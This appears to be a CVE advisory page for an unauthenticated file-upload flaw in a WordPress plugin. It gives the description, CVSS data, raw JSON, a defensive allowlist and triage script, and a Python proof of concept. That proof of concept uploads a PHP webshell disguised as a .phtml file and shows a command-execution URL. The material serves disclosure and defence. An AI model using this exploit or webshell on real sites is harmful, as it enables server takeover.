Security Vulnerability Report
CVE-2026-4885 CVSS 9.8 CRITICAL


Published: 2026-05-19 08:16:16
Last Modified: 2026-05-19 14:38:40

Description

The Piotnet Addons for Elementor Pro plugin for WordPress is vulnerable to arbitrary file upload due to missing file type validation in the 'pafe_ajax_form_builder' function in all versions up to, and including, 7.1.70. The plugin uses an incomplete extension blacklist that only blocks the php, phpt, php5, php7, and exe extensions, while allowing dangerous extensions such as .phar or .phtml to be uploaded. This makes it possible for unauthenticated attackers to upload arbitrary files to the affected site's server, which may make remote code execution possible. Note: the vulnerability can only be exploited if a file field has been added to the form.
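The weakness described above is the classic incomplete-blacklist pattern (CWE-434, the weakness the record assigns). As an added illustration that is not the plugin's code, the Python below models the advisory's blacklist (php, phpt, php5, php7, exe) beside a hardened allowlist check, and uses the difference between the two as a triage filter over an upload directory listing; the allowlist contents, the function names and the sample listing are this example's own assumptions.

```python
import os
from pathlib import PurePosixPath

# Extensions the vulnerable plugin versions (<= 7.1.70) reject, per the advisory.
VULNERABLE_BLACKLIST = {"php", "phpt", "php5", "php7", "exe"}

# Hypothetical allowlist for a form upload field; tailor it to what the form
# actually needs. This is an assumption of the example, not plugin configuration.
UPLOAD_ALLOWLIST = {"jpg", "jpeg", "png", "gif", "pdf", "txt", "csv"}


def blacklist_allows(filename: str) -> bool:
    """Model of the weak check: reject only if the final extension is listed.
    Anything not on the list, such as .phtml or .phar, sails through."""
    ext = PurePosixPath(filename).suffix.lstrip(".").lower()
    return ext not in VULNERABLE_BLACKLIST


def allowlist_allows(filename: str) -> bool:
    """Hardened check: a plain basename with exactly one extension, and that
    extension must be on the allowlist. Unknown and stacked extensions fail
    closed, so shell.phtml, shell.phar or name.pdf.phtml never pass."""
    if not filename or os.path.basename(filename) != filename:
        return False  # path separators or an empty name
    stem, dot, ext = filename.lower().rpartition(".")
    if not dot or not stem or "." in stem:
        return False  # no extension, leading dot, or more than one extension
    return ext in UPLOAD_ALLOWLIST


def find_suspect_uploads(listing):
    """Incident-response triage: names the vulnerable blacklist would have
    accepted but the allowlist rejects. Feed it the site's upload tree."""
    return sorted(n for n in listing if blacklist_allows(n) and not allowlist_allows(n))


# Constructed sample listing of an uploads directory (not real data).
SAMPLE_LISTING = [
    "photo.jpg", "resume.pdf", "notes.txt",
    "cv.php",              # blocked by both checks
    "shell.phtml",         # passes the blacklist, rejected by the allowlist
    "shell.phar",          # same
    "invoice.pdf.phtml",   # stacked extension: the last one is not blacklisted
]

if __name__ == "__main__":
    for name in find_suspect_uploads(SAMPLE_LISTING):
        print(f"[suspect] {name}")
```

The triage function is the part worth keeping after patching: run it over the existing upload directories, since upgrading the plugin does not remove files that were accepted before.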

CVSS Details

CVSS Score: 9.8
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Piotnet Addons for Elementor Pro <= 7.1.70

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# Target configuration
target_url = "http://example.com"
upload_endpoint = f"{target_url}/wp-admin/admin-ajax.php"

# Payload: A simple PHP webshell saved as .phtml to bypass blacklist
# The blacklist blocks .php but often misses .phtml or .phar
file_content = "<?php system($_GET['cmd']); ?>"
files = {
    'file': ('shell.phtml', file_content, 'application/octet-stream')
}

# Data required to trigger the vulnerable function
data = {
    'action': 'pafe_ajax_form_builder',
    'form_data': '...'  # Additional form data if required
}

try:
    response = requests.post(upload_endpoint, files=files, data=data)
    if response.status_code == 200:
        print("[+] File upload request sent successfully.")
        print("[+] Check the upload directory or response for the file path.")
        # Example execution: http://example.com/wp-content/uploads/2026/05/shell.phtml?cmd=whoami
    else:
        print("[-] Failed to send request.")
except Exception as e:
    print(f"[!] Error: {e}")
```

References

https://pafe.piotnet.com/
https://www.wordfence.com/threat-intel/vulnerabilities/id/ffff2ff3-769d-4eb2-acbe-d8ce6f042581?source=cve
Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-4885",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-19T08:16:16.223",
    "lastModified": "2026-05-19T14:38:39.660",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Piotnet Addons for Elementor Pro plugin for WordPress is vulnerable to arbitrary file upload due to missing file type validation in the 'pafe_ajax_form_builder' function in all versions up to, and including, 7.1.70. The plugin uses an incomplete extension blacklist that only blocks php, phpt, php5, php7, and exe extensions, while allowing dangerous extensions such as .phar or .phtml to be uploaded. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible. Note: The exploit can only be exploited if a file field is added to the form."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-434"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://pafe.piotnet.com/",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/ffff2ff3-769d-4eb2-acbe-d8ce6f042581?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}
```